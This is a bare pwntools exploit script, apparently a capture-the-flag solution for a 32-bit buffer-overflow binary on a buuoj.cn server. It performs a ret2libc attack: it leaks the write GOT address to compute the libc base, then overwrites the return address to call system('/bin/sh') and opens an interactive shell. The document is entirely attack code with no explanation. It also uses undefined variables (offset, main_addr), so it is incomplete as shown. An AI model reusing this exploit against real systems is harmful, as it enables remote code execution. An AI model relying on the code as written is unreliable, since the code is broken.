1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| from pwn import *
p=remote('node3.buuoj.cn',29610)
elf=ELF('./bof')
libc=ELF('../libc-2.23_32.so')
p.recv()
payload=p8(0)*(offset+4)+p32(elf.plt['write'])+p32(main_addr)+p32(1)+p32(elf.got['write'])+p32(4)
p.sendline(payload)
libc_base=u32(p.recvuntil('\xf7')[-4:])-libc.symbols['write']
system_addr=libc_base+libc.symbols['system']
bin_sh=libc_base+next(libc.search(b'/bin/sh'))
print(hex(libc_base))
print(hex(bin_sh))
print(hex(system_addr))
payload=b'p'*(offset+4)+p32(system_addr)+b'dead'+p32(bin_sh)
p.sendline(payload)
p.interactive()
|